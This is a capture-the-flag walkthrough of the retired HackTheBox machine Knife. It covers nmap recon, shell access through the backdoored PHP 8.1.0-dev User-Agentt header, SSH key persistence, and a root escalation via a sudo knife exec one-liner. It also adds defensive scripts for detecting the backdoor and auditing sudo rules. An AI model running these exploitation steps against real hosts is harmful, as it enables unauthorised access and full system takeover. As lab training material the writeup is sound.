Writeup for the easy ranked HTB box Knife

Posted on Sep 15, 2021

Knife

“An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header. The following exploit uses the backdoor to provide a pseudo shell on the host.”

This box is retired from the Hackthebox active session and in my opinion is a good “starting box” if you are new to hacking. I spent a little too much time poking at the webserver before I found the vulnerable PHP dev version that gives initial access, but once I found that it was pretty straightforward. Tools I used on this box include Nmap, DIRB, Nikto, Searchsploit and Burp. The environment I used was a Kali VM (in Parallels Desktop 17) on my macOS machine (I either use a VM with Kali or a prepped Docker image). Use this as a step-by-step guide or to see my structure when approaching a new box.

Let’s go!

Reconnaissance

Starting off with a standard nmap scan, it shows that ports 22 and 80 are open. As soon as I see port 80 (or any webserver port), I start dirb to see if I can find any interesting directories and nikto to find vulnerabilities on the website. This time neither of the tools found anything of interest.

Port scanning with NMAP

┌──(erra㉿kali)-[~/htb/knife]
└─$ sudo nmap -T4 -Pn -p- -A knife.htb -o nmap.init
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-14 08:21 CEST
Nmap scan report for knife.htb (10.10.10.242)
Host is up (0.037s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=9/14%OT=22%CT=1%CU=40780%PV=Y%DS=2%DC=T%G=Y%TM=61403F9
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 256/tcp)
HOP RTT      ADDRESS
1   39.94 ms 10.10.14.1
2   40.82 ms knife.htb (10.10.10.242)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.99 seconds

Enumeration

Poking the website

Now I thought it was time to poke around on the website, but I didn’t find anything interesting; it was mostly a static webpage. After some time I started Burp Suite to capture some traffic, and my eyes caught the PHP version (PHP/8.1.0-dev).

[Screenshot: Burp]

Then I used searchsploit to see if there were any POCs, and luckily I found an RCE.

┌──(erra㉿kali)-[~/htb/knife]
└─$ searchsploit 8.1.0-dev
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution                                                                      | php/webapps/49933.py
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(erra㉿kali)-[~/htb/knife]
└─$ searchsploit -m 49933.py
  Exploit: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/49933
     Path: /usr/share/exploitdb/exploits/php/webapps/49933.py
File Type: Python script, ASCII text executable

Copied to: /home/erra/htb/knife/49933.py

Exploitation

Gaining initial access (user)

Reading through the exploit to understand what it does: it abuses a backdoor that was planted in this specific version of PHP. The POC uses Python 3 with the requests, re and os libraries to provide a pseudo-shell. Pretty straightforward, and we got user.txt from a crappy shell as the user james!

┌──(erra㉿kali)-[~/htb/knife]
└─$ python3 49933.py
Enter the full host url:
http://knife.htb

Interactive shell is opened on http://knife.htb
Can't acces tty; job crontol turned off.
$ whoami
james

$ cat home/james/user.txt
****************
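Seen from the other side of the wire, this backdoor is easy to spot: no browser or library sends a header called User-Agentt, so its mere presence in a request is a reliable indicator, and the server banner that gave the version away in Burp is the same thing a scanner would flag. The script below is an added example for this writeup, not the exploit-db POC and not code from the box; the raw requests are constructed, and it assumes the version string was in the X-Powered-By response header.

```python
"""Spotting the PHP 8.1.0-dev backdoor from the defender's side.

Added example for this writeup; it is not the exploit-db PoC and not
code from the box. The sample requests and headers below are constructed.
"""
import re
from typing import Dict, List

# Constructed raw HTTP requests, as a reverse proxy or IDS sensor might
# capture them (request line + headers, no bodies).
SAMPLE_REQUESTS: List[str] = [
    "GET / HTTP/1.1\r\nHost: knife.htb\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    # probe: a normal User-Agent plus the backdoor's misspelt twin header
    "GET / HTTP/1.1\r\nHost: knife.htb\r\nUser-Agent: curl/7.68.0\r\n"
    "User-Agentt: <constructed payload>\r\n\r\n",
    # header names are case-insensitive, so this one must be caught too
    "GET /index.php HTTP/1.1\r\nHost: knife.htb\r\nuser-agentt: x\r\n\r\n",
]


def parse_headers(raw_request: str) -> Dict[str, str]:
    """Map header names (lower-cased) to values for one raw HTTP request."""
    head, _, _body = raw_request.partition("\r\n\r\n")
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def is_backdoor_probe(raw_request: str) -> bool:
    """No real client sends a header called User-Agentt; its presence
    alone is a reliable sign that someone is poking at the backdoor."""
    return "user-agentt" in parse_headers(raw_request)


def find_backdoor_probes(requests: List[str]) -> List[int]:
    """Indices of the requests that carry the backdoor header."""
    return [i for i, req in enumerate(requests) if is_backdoor_probe(req)]


# The box advertised "PHP/8.1.0-dev" in a response header (that is what
# showed up in Burp); assumption: it was the X-Powered-By header.
BACKDOORED_VERSION = re.compile(r"\bPHP/8\.1\.0-dev\b", re.IGNORECASE)


def exposes_backdoored_php(response_headers: Dict[str, str]) -> bool:
    """True if the server banner names the backdoored dev build."""
    banner = response_headers.get("x-powered-by", "")
    return bool(BACKDOORED_VERSION.search(banner))


if __name__ == "__main__":
    for idx in find_backdoor_probes(SAMPLE_REQUESTS):
        print(f"request {idx}: User-Agentt header present -> backdoor probe")
    print("banner check:", exposes_backdoored_php({"x-powered-by": "PHP/8.1.0-dev"}))
```

Matching on the header name rather than on a payload keeps the check cheap and hard to evade, but it is only a tripwire; the real fix is replacing the dev build with a released PHP version and turning off the version banner (expose_php=Off) so scanners have less to go on.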

Gaining SSH access

The initial shell I got was, as usual, pretty bad (no autocomplete etc.), and when I tried stabilising the shell it didn’t work right away, so I ended up just adding my public SSH key to home/james/.ssh/authorized_keys, by first generating a new SSH key pair:

┌──(erra㉿kali)-[~/tmp]
└─$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/erra/.ssh/id_rsa): id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in id_rsa
Your public key has been saved in id_rsa.pub
The key fingerprint is:
SHA256:2nui959CJSGp5xSvFu40NISfUR6NJ3/fGXERCW4+6k0 erra@kali
The key's randomart image is:
+---[RSA 3072]----+
|       . ooo ..o+|
|      . *.+.+  o.|
|       + *.= o  o|
|      . O o = .. |
|       *S+ o + .+|
|       oB . . ..o|
|      .+.o . E   |
|        +.+ o.   |
|      .o.+.+o.   |
+----[SHA256]-----+

Then echo the contents of id_rsa.pub into the box’s authorized_keys:

$ echo "ssh-rsa <id_rsa.pub key data> erra@kali" > home/james/.ssh/authorized_keys

Privilege escalation

The first thing I always do when I have user is running sudo -l to see if my user can run anything as superuser. If that doesn’t return anything useful, I usually get linpeas.sh onto the box for further enumeration.

Quick enumeration of knife-box

But on this box there was this knife program that the user james could run as root. After some research I figured out that it is a command-line tool that provides an interface between a local chef-repo and the Chef Infra Server (see the Knife documentation). It seems you can run Ruby scripts with the syntax /usr/bin/knife exec script.rb, so let’s try to escalate privileges.

┌──(erra㉿kali)-[~/htb/knife]
└─$ ssh -i id_rsa james@knife.htb
The authenticity of host 'knife.htb (10.10.10.242)' can't be established.
ECDSA key fingerprint is SHA256:b8jYX4F9OUtvZffH50q3L3B4hrSL/TxxPuue0hlbvRU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Failed to add the host to the list of known hosts (/home/erra/.ssh/known_hosts).
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 14 Sep 2021 10:25:34 AM UTC

  System load:             0.0
  Usage of /:              54.8% of 9.72GB
  Memory usage:            52%
  Swap usage:              0%
  Processes:               313
  Users logged in:         0
  IPv4 address for ens160: 10.10.10.242
  IPv6 address for ens160: dead:beef::250:56ff:feb9:8a73

99 updates can be applied immediately.
69 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue Sep 14 10:21:19 2021 from 10.10.14.10
james@knife:~$
james@knife:~$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
james@knife:~$

Privilege escalation from user to root

First I found in the documentation that you can run Ruby scripts with the command /usr/bin/knife exec script.rb; here is a POC showing how easily it works:

james@knife:~$ cat script.rb
#!/usr/bin/env ruby

exec "ls"

james@knife:~$ sudo /usr/bin/knife exec script.rb
script.rb  user.txt

Another way to escalate privileges

After some more research I found a quick one-liner on GTFOBins:

james@knife:~$ sudo knife exec -E 'exec "/bin/sh"'
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
****************************
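The root cause here is not knife itself but the sudo rule: a NOPASSWD grant on a binary that has a built-in "run code" subcommand is the same as granting a root shell. The audit script below is an added example for this writeup (not code from the box or from GTFOBins); it parses the sudo -l output shown above, copied verbatim, and flags rules that amount to unrestricted root. The list of code-executing binaries is a constructed starting point, not an exhaustive one.

```python
"""Audit `sudo -l` output for rules that hand out root through a tool
that can run arbitrary code.

Added example for this writeup, not code from the box or from GTFOBins.
The sudo output is copied from the session above; CODE_EXEC_CAPABLE is a
constructed starting list.
"""
import re
from dataclasses import dataclass
from typing import List

SUDO_L_OUTPUT = r"""Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
"""

# Constructed list: binaries whose ordinary command line lets the caller
# run arbitrary code (knife does it through `knife exec`). Extend per host.
CODE_EXEC_CAPABLE = {
    "/usr/bin/knife", "/usr/bin/ruby", "/usr/bin/python3",
    "/usr/bin/perl", "/bin/bash", "/bin/sh",
}

# "(root) NOPASSWD: /usr/bin/knife"  ->  runas / tags / command
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>\S.*?)\s*$"
)


@dataclass
class SudoRule:
    runas: str
    nopasswd: bool
    command: str


def parse_sudo_l(text: str) -> List[SudoRule]:
    """Extract the command rules from `sudo -l` output (one rule per line;
    a comma-separated command list on one line is kept as one string)."""
    rules: List[SudoRule] = []
    in_commands = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands or not line.strip():
            continue
        match = RULE_RE.match(line)
        if match is None:
            continue
        runas = match.group("runas").split(":")[0].strip()  # "(root : root)" -> root
        nopasswd = "NOPASSWD:" in match.group("tags").upper()
        rules.append(SudoRule(runas, nopasswd, match.group("cmd")))
    return rules


def risky_rules(rules: List[SudoRule]) -> List[SudoRule]:
    """Rules that are effectively 'run anything as root': ALL, or a binary
    from CODE_EXEC_CAPABLE whose arguments are not pinned (or are wildcarded).
    sudoers matches argument lists exactly, so `/usr/bin/knife node list`
    would not let the user reach `knife exec`."""
    out: List[SudoRule] = []
    for rule in rules:
        if rule.runas not in ("root", "ALL"):
            continue
        binary, *args = rule.command.split()
        unpinned = not args or any("*" in arg for arg in args)
        if rule.command == "ALL" or (binary in CODE_EXEC_CAPABLE and unpinned):
            out.append(rule)
    return out


if __name__ == "__main__":
    for rule in risky_rules(parse_sudo_l(SUDO_L_OUTPUT)):
        auth = "NOPASSWD" if rule.nopasswd else "password"
        print(f"risky: ({rule.runas}) {rule.command} [{auth}]")
```

Run it against sudo -l output collected from a fleet and the knife rule pops out immediately. The fix on a real host is either to drop the rule or to pin the exact subcommands james needs (and never a bare /usr/bin/knife); the NOPASSWD tag only makes a bad rule worse, it is not the thing that makes it exploitable.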

Summary

After all, as I said in the beginning, this is an easy box and is good for beginners who are new to hacking. One of the most important things for me when learning is DOCUMENTATION: have a strategy and follow it. It is so easy to go down the rabbit hole and lose many, many hours on the wrong things. Hope you found this writeup useful!

/Eric (cyberrauken)
